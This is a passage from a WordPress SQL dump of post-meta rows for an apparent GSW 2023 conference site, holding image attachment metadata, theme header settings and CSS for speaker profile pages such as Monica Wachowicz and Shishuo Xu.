:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:41:\"cairo-egypt_shutterstock_1421974805-1.jpg\";}'),
(21638,3381,'_wp_attached_file','2022/11/esa.jpg'),
(21639,3381,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1024;s:6:\"height\";i:683;s:4:\"file\";s:15:\"2022/11/esa.jpg\";s:8:\"filesize\";i:203537;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:15:\"esa-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16850;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"esa-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7394;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:15:\"esa-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:83239;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:15:\"esa-500x333.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:333;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40034;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:15:\"esa-800x534.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:534;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:89160;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(21640,2082,'_wp_old_date','2022-11-09'),
(21641,2083,'_wp_old_date','2022-11-09'),
(21642,2346,'_wp_old_date','2022-11-09'),
(21643,2348,'_wp_old_date','2022-11-09'),
(21644,2349,'_wp_old_date','2022-11-09'),
(21645,2350,'_wp_old_date','2022-11-09'),
(21646,2351,'_wp_old_date','2022-11-09'),
(21647,2904,'_wp_old_date','2022-11-09'),
(21648,2084,'_wp_old_date','2022-11-09'),
(21649,2352,'_wp_old_date','2022-11-09'),
(21650,2281,'_wp_old_date','2022-11-09'),
(21651,2353,'_wp_old_date','2022-11-09'),
(21652,2354,'_wp_old_date','2022-11-09'),
(21653,2355,'_wp_old_date','2022-11-09'),
(21654,2282,'_wp_old_date','2022-11-09'),
(21655,2283,'_wp_old_date','2022-11-09'),
(21656,2284,'_wp_old_date','2022-11-09'),
(21657,2921,'_wp_old_date','2022-11-09'),
(21658,2285,'_wp_old_date','2022-11-09'),
(21659,2356,'_wp_old_date','2022-11-09'),
(21660,2357,'_wp_old_date','2022-11-09'),
(21661,2359,'_wp_old_date','2022-11-09'),
(21662,2358,'_wp_old_date','2022-11-09'),
(21663,2286,'_wp_old_date','2022-11-09'),
(21664,3386,'_edit_lock','1675608658:1'),
(21665,3387,'_wp_attached_file','2022/12/ws23.jpg'),
(21666,3387,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:512;s:6:\"height\";i:340;s:4:\"file\";s:16:\"2022/12/ws23.jpg\";s:8:\"filesize\";i:228672;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"ws23-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23331;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"ws23-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10413;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:16:\"ws23-500x332.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:332;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:50719;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(21667,3386,'_thumbnail_id','3387'),
(21668,3386,'_edit_last','1'),
(21669,3386,'_wpb_vc_js_status','true'),
(21670,3386,'_dt_sidebar_position','disabled'),
(21671,3386,'_dt_sidebar_widgetarea_id','sidebar_1'),
(21672,3386,'_dt_sidebar_hide_on_mobile','0'),
(21673,3386,'_dt_footer_show','0'),
(21674,3386,'_dt_footer_widgetarea_id','sidebar_2'),
(21675,3386,'_dt_footer_hide_on_mobile','0'),
(21676,3386,'_dt_header_title','fancy'),
(21677,3386,'_dt_header_background','normal'),
(21678,3386,'_dt_header_background_below_slideshow','disabled'),
(21679,3386,'_dt_header_transparent_bg_color_scheme','light'),
(21680,3386,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(21681,3386,'_dt_header_transparent_top_bar_bg_opacity','25'),
(21682,3386,'_dt_header_transparent_bg_color','#000000'),
(21683,3386,'_dt_header_transparent_bg_opacity','50'),
(21684,3386,'_dt_header_disabled_background','normal'),
(21685,3386,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(21686,3386,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(21687,3386,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(21688,3386,'_dt_header_disabled_transparent_bg_color','#000000'),
(21689,3386,'_dt_header_disabled_transparent_bg_opacity','50'),
(21690,3386,'_dt_page_overrides_top_margin',''),
(21691,3386,'_dt_page_overrides_right_margin',''),
(21692,3386,'_dt_page_overrides_bottom_margin',''),
(21693,3386,'_dt_page_overrides_left_margin',''),
(21694,3386,'_dt_mobile_page_padding_top',''),
(21695,3386,'_dt_mobile_page_padding_right',''),
(21696,3386,'_dt_mobile_page_padding_bottom',''),
(21697,3386,'_dt_mobile_page_padding_left',''),
(21698,3386,'_dt_fancy_header_layout_heading',''),
(21699,3386,'_dt_fancy_header_title_aligment','center'),
(21700,3386,'_dt_fancy_header_height','300'),
(21701,3386,'_dt_fancy_header_padding-top','0px'),
(21702,3386,'_dt_fancy_header_padding-bottom','0px'),
(21703,3386,'_dt_fancy_header_breadcrumbs_heading',''),
(21704,3386,'_dt_fancy_header_breadcrumbs','disabled'),
(21705,3386,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(21706,3386,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(21707,3386,'_dt_fancy_header_title_heading',''),
(21708,3386,'_dt_fancy_header_title_mode','custom'),
(21709,3386,'_dt_fancy_header_title',''),
(21710,3386,'_dt_fancy_header_title_font_size','30'),
(21711,3386,'_dt_fancy_header_title_line_height','36'),
(21712,3386,'_dt_fancy_header_text_transform','none'),
(21713,3386,'_dt_fancy_header_title_color_mode','color'),
(21714,3386,'_dt_fancy_header_title_color','#000000'),
(21715,3386,'_dt_fancy_header_subtitle_heading',''),
(21716,3386,'_dt_fancy_header_subtitle',''),
(21717,3386,'_dt_fancy_header_subtitle_font_size','18'),
(21718,3386,'_dt_fancy_header_subtitle_line_height','26'),
(21719,3386,'_dt_fancy_header_subtitle_text_transform','none'),
(21720,3386,'_dt_fancy_header_subtitle_color_mode','color'),
(21721,3386,'_dt_fancy_header_subtitle_color','#000000'),
(21722,3386,'_dt_fancy_header_bg_heading',''),
(21723,3386,'_dt_fancy_header_bg_color','#222222'),
(21724,3386,'_dt_fancy_header_bg_image_origin','featured_image'),
(21725,3386,'_dt_fancy_header_bg_image','a:0:{}'),
(21726,3386,'_dt_fancy_header_bg_repeat','no-repeat'),
(21727,3386,'_dt_fancy_header_bg_position_x','center'),
(21728,3386,'_dt_fancy_header_bg_position_y','center'),
(21729,3386,'_dt_fancy_header_bg_fullscreen','1'),
(21730,3386,'_dt_fancy_header_bg_overlay','0'),
(21731,3386,'_dt_fancy_header_overlay_color','#000'),
(21732,3386,'_dt_fancy_header_bg_overlay_opacity','50'),
(21733,3386,'_dt_fancy_header_scroll_effect','default'),
(21734,3386,'_dt_fancy_header_bg_parallax','0.5'),
(21735,3386,'_dt_fancy_header_responsiveness_heading',''),
(21736,3386,'_dt_fancy_header_responsiveness','disabled'),
(21737,3386,'_dt_fancy_header_responsiveness_switch','778px'),
(21738,3386,'_dt_fancy_header_responsive_height','70'),
(21739,3386,'_dt_fancy_header_responsive_font_size','30'),
(21740,3386,'_dt_fancy_header_responsive_title_line_height','38'),
(21741,3386,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(21742,3386,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(21743,3386,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(21744,3386,'_dt_project_options_back_button',''),
(21745,3386,'_dt_project_options_show_link',''),
(21746,3386,'_dt_project_options_link',''),
(21747,3386,'_dt_project_options_link_target',''),
(21748,3386,'_dt_project_options_link_name',''),
(21749,3386,'_dt_project_options_hide_thumbnail','1'),
(21750,3386,'_dt_project_options_open_thumbnail_in_lightbox','0'),
(21751,3386,'_dt_project_options_related_mode','same'),
(21752,3386,'_dt_project_options_preview','normal'),
(21753,3386,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2022/12/ws23.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #000000;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #000000;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(21754,3386,'_wp_page_template','default'),
(21755,3386,'_dt_microsite_primary_menu',''),
(21756,3386,'_dt_microsite_split_left_menu',''),
(21757,3386,'_dt_microsite_split_right_menu',''),
(21758,3386,'_dt_microsite_mobile_menu',''),
(21759,3389,'_edit_lock','1670302222:1'),
(21760,3390,'_wp_attached_file','2022/12/w231.jpg'),
(21761,3390,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:81;s:6:\"height\";i:100;s:4:\"file\";s:16:\"2022/12/w231.jpg\";s:8:\"filesize\";i:18537;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(21762,3389,'_thumbnail_id','3390'),
(21763,3389,'_edit_last','1'),
(21764,3389,'_dt_sidebar_position','disabled'),
(21765,3389,'_dt_sidebar_widgetarea_id','sidebar_1'),
(21766,3389,'_dt_sidebar_hide_on_mobile','0'),
(21767,3389,'_dt_footer_show','1'),
(21768,3389,'_dt_footer_widgetarea_id','sidebar_2'),
(21769,3389,'_dt_footer_hide_on_mobile','0'),
(21770,3389,'_dt_header_title','fancy'),
(21771,3389,'_dt_header_background','normal'),
(21772,3389,'_dt_header_background_below_slideshow','disabled'),
(21773,3389,'_dt_header_transparent_bg_color_scheme','light'),
(21774,3389,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(21775,3389,'_dt_header_transparent_top_bar_bg_opacity','25'),
(21776,3389,'_dt_header_transparent_bg_color','#000000'),
(21777,3389,'_dt_header_transparent_bg_opacity','50'),
(21778,3389,'_dt_header_disabled_background','normal'),
(21779,3389,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(21780,3389,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(21781,3389,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(21782,3389,'_dt_header_disabled_transparent_bg_color','#000000'),
(21783,3389,'_dt_header_disabled_transparent_bg_opacity','50'),
(21784,3389,'_dt_page_overrides_top_margin',''),
(21785,3389,'_dt_page_overrides_right_margin',''),
(21786,3389,'_dt_page_overrides_bottom_margin',''),
(21787,3389,'_dt_page_overrides_left_margin',''),
(21788,3389,'_dt_mobile_page_padding_top',''),
(21789,3389,'_dt_mobile_page_padding_right',''),
(21790,3389,'_dt_mobile_page_padding_bottom',''),
(21791,3389,'_dt_mobile_page_padding_left',''),
(21792,3389,'_dt_fancy_header_layout_heading',''),
(21793,3389,'_dt_fancy_header_title_aligment','center'),
(21794,3389,'_dt_fancy_header_height','300'),
(21795,3389,'_dt_fancy_header_padding-top','0px'),
(21796,3389,'_dt_fancy_header_padding-bottom','0px'),
(21797,3389,'_dt_fancy_header_breadcrumbs_heading',''),
(21798,3389,'_dt_fancy_header_breadcrumbs','enabled'),
(21799,3389,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(21800,3389,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(21801,3389,'_dt_fancy_header_title_heading',''),
(21802,3389,'_dt_fancy_header_title_mode','custom'),
(21803,3389,'_dt_fancy_header_title','Monica Wachowicz'),
(21804,3389,'_dt_fancy_header_title_font_size','30'),
(21805,3389,'_dt_fancy_header_title_line_height','36'),
(21806,3389,'_dt_fancy_header_text_transform','none'),
(21807,3389,'_dt_fancy_header_title_color_mode','color'),
(21808,3389,'_dt_fancy_header_title_color','#ffffff'),
(21809,3389,'_dt_fancy_header_subtitle_heading',''),
(21810,3389,'_dt_fancy_header_subtitle','RMIT University, Australia (WG IV/7)'),
(21811,3389,'_dt_fancy_header_subtitle_font_size','18'),
(21812,3389,'_dt_fancy_header_subtitle_line_height','26'),
(21813,3389,'_dt_fancy_header_subtitle_text_transform','none'),
(21814,3389,'_dt_fancy_header_subtitle_color_mode','color'),
(21815,3389,'_dt_fancy_header_subtitle_color','#ffffff'),
(21816,3389,'_dt_fancy_header_bg_heading',''),
(21817,3389,'_dt_fancy_header_bg_color','#222222'),
(21818,3389,'_dt_fancy_header_bg_image_origin','custom'),
(21819,3389,'_dt_fancy_header_bg_image','a:0:{}'),
(21820,3389,'_dt_fancy_header_bg_repeat','no-repeat'),
(21821,3389,'_dt_fancy_header_bg_position_x','center'),
(21822,3389,'_dt_fancy_header_bg_position_y','center'),
(21823,3389,'_dt_fancy_header_bg_fullscreen','1'),
(21824,3389,'_dt_fancy_header_bg_overlay','0'),
(21825,3389,'_dt_fancy_header_overlay_color','#000'),
(21826,3389,'_dt_fancy_header_bg_overlay_opacity','50'),
(21827,3389,'_dt_fancy_header_scroll_effect','default'),
(21828,3389,'_dt_fancy_header_bg_parallax','0.5'),
(21829,3389,'_dt_fancy_header_responsiveness_heading',''),
(21830,3389,'_dt_fancy_header_responsiveness','enabled'),
(21831,3389,'_dt_fancy_header_responsiveness_switch','778px'),
(21832,3389,'_dt_fancy_header_responsive_height','70'),
(21833,3389,'_dt_fancy_header_responsive_font_size','30'),
(21834,3389,'_dt_fancy_header_responsive_title_line_height','38'),
(21835,3389,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(21836,3389,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(21837,3389,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(21838,3389,'_dt_teammate_options_go_to_single','1'),
(21839,3389,'_dt_teammate_options_position',''),
(21840,3389,'_dt_teammate_options_website',''),
(21841,3389,'_dt_teammate_options_mail',''),
(21842,3389,'_dt_teammate_options_facebook',''),
(21843,3389,'_dt_teammate_options_twitter',''),
(21844,3389,'_dt_teammate_options_dribbble',''),
(21845,3389,'_dt_teammate_options_you-tube',''),
(21846,3389,'_dt_teammate_options_rss',''),
(21847,3389,'_dt_teammate_options_delicious',''),
(21848,3389,'_dt_teammate_options_flickr',''),
(21849,3389,'_dt_teammate_options_lastfm',''),
(21850,3389,'_dt_teammate_options_linkedin',''),
(21851,3389,'_dt_teammate_options_vimeo',''),
(21852,3389,'_dt_teammate_options_tumbler',''),
(21853,3389,'_dt_teammate_options_pinterest',''),
(21854,3389,'_dt_teammate_options_devian',''),
(21855,3389,'_dt_teammate_options_skype',''),
(21856,3389,'_dt_teammate_options_github',''),
(21857,3389,'_dt_teammate_options_instagram',''),
(21858,3389,'_dt_teammate_options_stumbleupon',''),
(21859,3389,'_dt_teammate_options_behance',''),
(21860,3389,'_dt_teammate_options_px-500',''),
(21861,3389,'_dt_teammate_options_tripedvisor',''),
(21862,3389,'_dt_teammate_options_vk',''),
(21863,3389,'_dt_teammate_options_foursquare',''),
(21864,3389,'_dt_teammate_options_xing',''),
(21865,3389,'_dt_teammate_options_weibo',''),
(21866,3389,'_dt_teammate_options_odnoklassniki',''),
(21867,3389,'_dt_teammate_options_research-gate',''),
(21868,3389,'_dt_teammate_options_yelp',''),
(21869,3389,'_dt_teammate_options_blogger',''),
(21870,3389,'_dt_teammate_options_soundcloud',''),
(21871,3389,'_dt_teammate_options_viber',''),
(21872,3389,'_dt_teammate_options_whatsapp',''),
(21873,3389,'_dt_teammate_options_reddit',''),
(21874,3389,'_dt_teammate_options_snapchat',''),
(21875,3389,'_dt_teammate_options_telegram',''),
(21876,3389,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(21877,3391,'_edit_lock','1670302324:1'),
(21878,3392,'_wp_attached_file','2022/12/w232.jpg'),
(21879,3392,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:77;s:6:\"height\";i:100;s:4:\"file\";s:16:\"2022/12/w232.jpg\";s:8:\"filesize\";i:17018;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(21880,3391,'_thumbnail_id','3392'),
(21881,3391,'_edit_last','1'),
(21882,3391,'_dt_sidebar_position','disabled'),
(21883,3391,'_dt_sidebar_widgetarea_id','sidebar_1'),
(21884,3391,'_dt_sidebar_hide_on_mobile','0'),
(21885,3391,'_dt_footer_show','0'),
(21886,3391,'_dt_footer_widgetarea_id','sidebar_2'),
(21887,3391,'_dt_footer_hide_on_mobile','0'),
(21888,3391,'_dt_header_title','fancy'),
(21889,3391,'_dt_header_background','normal'),
(21890,3391,'_dt_header_background_below_slideshow','disabled'),
(21891,3391,'_dt_header_transparent_bg_color_scheme','light'),
(21892,3391,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(21893,3391,'_dt_header_transparent_top_bar_bg_opacity','25'),
(21894,3391,'_dt_header_transparent_bg_color','#000000'),
(21895,3391,'_dt_header_transparent_bg_opacity','50'),
(21896,3391,'_dt_header_disabled_background','normal'),
(21897,3391,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(21898,3391,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(21899,3391,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(21900,3391,'_dt_header_disabled_transparent_bg_color','#000000'),
(21901,3391,'_dt_header_disabled_transparent_bg_opacity','50'),
(21902,3391,'_dt_page_overrides_top_margin',''),
(21903,3391,'_dt_page_overrides_right_margin',''),
(21904,3391,'_dt_page_overrides_bottom_margin',''),
(21905,3391,'_dt_page_overrides_left_margin',''),
(21906,3391,'_dt_mobile_page_padding_top',''),
(21907,3391,'_dt_mobile_page_padding_right',''),
(21908,3391,'_dt_mobile_page_padding_bottom',''),
(21909,3391,'_dt_mobile_page_padding_left',''),
(21910,3391,'_dt_fancy_header_layout_heading',''),
(21911,3391,'_dt_fancy_header_title_aligment','center'),
(21912,3391,'_dt_fancy_header_height','300'),
(21913,3391,'_dt_fancy_header_padding-top','0px'),
(21914,3391,'_dt_fancy_header_padding-bottom','0px'),
(21915,3391,'_dt_fancy_header_breadcrumbs_heading',''),
(21916,3391,'_dt_fancy_header_breadcrumbs','disabled'),
(21917,3391,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(21918,3391,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(21919,3391,'_dt_fancy_header_title_heading',''),
(21920,3391,'_dt_fancy_header_title_mode','custom'),
(21921,3391,'_dt_fancy_header_title','Shishuo Xu'),
(21922,3391,'_dt_fancy_header_title_font_size','30'),
(21923,3391,'_dt_fancy_header_title_line_height','36'),
(21924,3391,'_dt_fancy_header_text_transform','none'),
(21925,3391,'_dt_fancy_header_title_color_mode','color'),
(21926,3391,'_dt_fancy_header_title_color','#ffffff'),
(21927,3391,'_dt_fancy_header_subtitle_heading',''),
(21928,3391,'_dt_fancy_header_subtitle','Beijing University of Civil Engineering & Architecture, China (WG IV/7)'),
(21929,3391,'_dt_fancy_header_subtitle_font_size','18'),
(21930,3391,'_dt_fancy_header_subtitle_line_height','26'),
(21931,3391,'_dt_fancy_header_subtitle_text_transform','none'),
(21932,3391,'_dt_fancy_header_subtitle_color_mode','color'),
(21933,3391,'_dt_fancy_header_subtitle_color','#ffffff'),
(21934,3391,'_dt_fancy_header_bg_heading',''),
(21935,3391,'_dt_fancy_header_bg_color','#222222'),
(21936,3391,'_dt_fancy_header_bg_image_origin','custom'),
(21937,3391,'_dt_fancy_header_bg_image','a:0:{}'),
(21938,3391,'_dt_fancy_header_bg_repeat','no-repeat'),
(21939,3391,'_dt_fancy_header_bg_position_x','center'),
(21940,3391,'_dt_fancy_header_bg_position_y','center'),
(21941,3391,'_dt_fancy_header_bg_fullscreen','1'),
(21942,3391,'_dt_fancy_header_bg_overlay','0'),
(21943,3391,'_dt_fancy_header_overlay_color','#000'),
(21944,3391,'_dt_fancy_header_bg_overlay_opacity','50'),
(21945,3391,'_dt_fancy_header_scroll_effect','default'),
(21946,3391,'_dt_fancy_header_bg_parallax','0.5'),
(21947,3391,'_dt_fancy_header_responsiveness_heading',''),
(21948,3391,'_dt_fancy_header_responsiveness','disabled'),
(21949,3391,'_dt_fancy_header_responsiveness_switch','778px'),
(21950,3391,'_dt_fancy_header_responsive_height','70'),
(21951,3391,'_dt_fancy_header_responsive_font_size','30'),
(21952,3391,'_dt_fancy_header_responsive_title_line_height','38'),
(21953,3391,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(21954,3391,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(21955,3391,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(21956,3391,'_dt_teammate_options_go_to_single','1'),
(21957,3391,'_dt_teammate_options_position',''),
(21958,3391,'_dt_teammate_options_website',''),
(21959,3391,'_dt_teammate_options_mail',''),
(21960,3391,'_dt_teammate_options_facebook',''),
(21961,3391,'_dt_teammate_options_twitter',''),
(21962,3391,'_dt_teammate_options_dribbble',''),
(21963,3391,'_dt_teammate_options_you-tube',''),
(21964,3391,'_dt_teammate_options_rss',''),
(21965,3391,'_dt_teammate_options_delicious',''),
(21966,3391,'_dt_teammate_options_flickr',''),
(21967,3391,'_dt_teammate_options_lastfm',''),
(21968,3391,'_dt_teammate_options_linkedin',''),
(21969,3391,'_dt_teammate_options_vimeo',''),
(21970,3391,'_dt_teammate_options_tumbler',''),
(21971,3391,'_dt_teammate_options_pinterest',''),
(21972,3391,'_dt_teammate_options_devian',''),
(21973,3391,'_dt_teammate_options_skype',''),
(21974,3391,'_dt_teammate_options_github',''),
(21975,3391,'_dt_teammate_options_instagram',''),
(21976,3391,'_dt_teammate_options_stumbleupon',''),
(21977,3391,'_dt_teammate_options_behance',''),
(21978,3391,'_dt_teammate_options_px-500',''),
(21979,3391,'_dt_teammate_options_tripedvisor',''),
(21980,3391,'_dt_teammate_options_vk',''),
(21981,3391,'_dt_teammate_options_foursquare',''),
(21982,3391,'_dt_teammate_options_xing',''),
(21983,3391,'_dt_teammate_options_weibo',''),
(21984,3391,'_dt_teammate_options_odnoklassniki',''),
(21985,3391,'_dt_teammate_options_research-gate',''),
(21986,3391,'_dt_teammate_options_yelp',''),
(21987,3391,'_dt_teammate_options_blogger',''),
(21988,3391,'_dt_teammate_options_soundcloud',''),
(21989,3391,'_dt_teammate_options_viber',''),
(21990,3391,'_dt_teammate_options_whatsapp',''),
(21991,3391,'_dt_teammate_options_reddit',''),
(21992,3391,'_dt_teammate_options_snapchat',''),
(21993,3391,'_dt_teammate_options_telegram',''),
(21994,3391,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header 